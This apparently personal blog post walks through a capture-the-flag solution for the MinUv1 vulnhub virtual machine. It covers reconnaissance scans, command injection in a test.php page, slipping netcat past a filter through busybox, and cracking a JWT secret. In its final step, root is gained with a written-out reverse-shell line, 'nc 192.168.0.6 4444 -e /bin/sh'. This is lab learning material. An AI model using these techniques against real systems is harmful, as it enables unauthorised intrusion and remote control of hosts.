Sorry it’s been quite a while since my last blog post.
Lately I’ve spent a decent chunk of time rooting virtual machines from vulnhub.com. The site distributes capture the flag (CTF) style virtual machines with various levels of difficultly and vulnerabilities to find.
Recently I finished the MinUv1 challenge. After reading the description in the “flag” and various other people’s blogs on how they circumvented the systems security I think I have a solution slightly different to the normal method.
If you haven’t yet finished the challenge then be warned, there are spoilers ahead.
Before I start I will mention this report contains mostly only the working parts of my solution, I spent quite a bit of time investigating what were ultimately dead ends.
OK so I downloaded the virtual machine from the website and launched it in virtual box. The first scan I did was a basic nmap:
The initial scan indicates that there is a http server running on port 80… OK that’s interesting but a deeper scan is always worth doing. This time with extra flags:
nmap -A -p- -Pn -n 192.168.0.11
What do these extra options do?
- -A nmap will try and identify the OS/service versions (this is noisy)
- -p- indicates the port ranges to scan
- -Pn skips host discovery, treats the hosts as online
- -n skips DNS resolution
This scan indicates the http server again running on port 80 and didn’t find any other services, but it did give us the service and version (Apache/2.4.27 (Ubuntu)).
I opened the IP address in firefox and only found the initial startup page when apache2 is first installed on Ubuntu. The page isn’t interactive and I don’t think it’s exploitable.
Next up I scan the website with nikto. This is usually a good starting point for web application exploitation as it usually finds important things quite quickly.
nikto -h 192.168.0.11
Interesting, nikto didn’t find anything at all.
At this point I thought back to a previous CTF I had completed where I used a tool called dirsearch to try and find files in directories without directory indexing.
./dirsearch.py -u http://192.168.0.11 -e html,php,cgi,txt,cfg
A hit! I opened the test.php page in my browser to view.
Immediately my thoughts go to directory traversal, or perhaps being able to dump the contents of /etc/passwd.
I give various parameters a try but they all seem to be met by 403 forbidden errors.
My next thought is command injection. I assume the php script is calling the system command “cat” to get the contents of the file so I try injecting a “whoami” command into the system call by separating the cat from my command with a semi colon “;”. Effectively if I am right the php script would be running:
This also returned forbidden, initially I thought that the file contents might be getting retrieved some other way but I tried a few other commands.
Success! There is a command injection and it is returned to the browser. Interesting that the whoami command (and some others that I tried) was blocked. At this point I assume there is some sort of script/WAF blocking certain commands from being executed.
The obvious thing to do here is to try and bind a reverse TCP shell from the server to my attacker machine. I try a few different ways of executing netcat, “nc”, “/bin/nc”, “netcat”, “/bin/netcat” etc, but all return a 403 forbidden error.
I remembered a comment on the netsec subreddit from a week or so ago about ways of bypassing local security restrictions by executing commands from within different unrestricted binaries, the site https://gtfobins.github.io/ contains a list of these binaries.
I spent quite a bit of time trying various combinations of netcat executing from these binaries but finally found busybox. Busybox is a utility which contains miniaturised versions of common utilities. I tried calling the busybox version of netcat:
Which didn’t 403. And after starting a listening netcat on my attacker machine:
Great! Now we have a shell as the www-data user on the server.
Once we are on the box I spent more time than I would like to admit combing through various configuration files looking for clues.
The passwd file contained the following:
Indicating there was a user named bob. I navigated to bob’s user directory to have a look.
Interesting file name here. The file contained what I eventually found out was a JWT (JSON web token). This file contains some data signed by secret. You can read the data without the secret, the secret is used to verify the data. You can read more about them here: https://jwt.io/.
I downloaded a utility which cracks the secret from these tokens JWT-Cracker and used it to crack the secret. This took some time (and I wish I had compiled one of the C based crackers)…
I make an assumption that bob, like many people, uses the same password in various places. I first want to try this password to get into bob’s account. The issue I had here was that the netcat shell is not a tty shell so you theoretically can’t run su (as the password is requested as part of a later input).
After quite a bit of googling I discovered that you can fool su by running it as part of the command “script -c “su…”” and then echoing the password prior to this command e.g.
echo mlnV1 | script -c 'su - bob'
I should note that this is a terrible idea on machines that you administer as it can leave the password in the bash history.
I tried this from my netcat www-data user shell:
OK so bob didn’t re-use this password for his account. What about root:
Interesting… looks like the script entered a root shell before exiting.
The script command replays the commands its given then exits so in order to keep the root shell running I executed the usual netcat command followed by the & symbol to start the command in the background.
echo mlnV1 | script -c "su - root 'nc 192.168.0.6 4444 -e /bin/sh &'"
And after running a listening nc on my attacker machine, I was able to root the machine!
As you can see from the description in the flag text as well as various blogs the intended vulnerability was to use wildcards in the command injection to bypass the WAF rather than busybox. Interesting that there is more than one way to finish this challenge.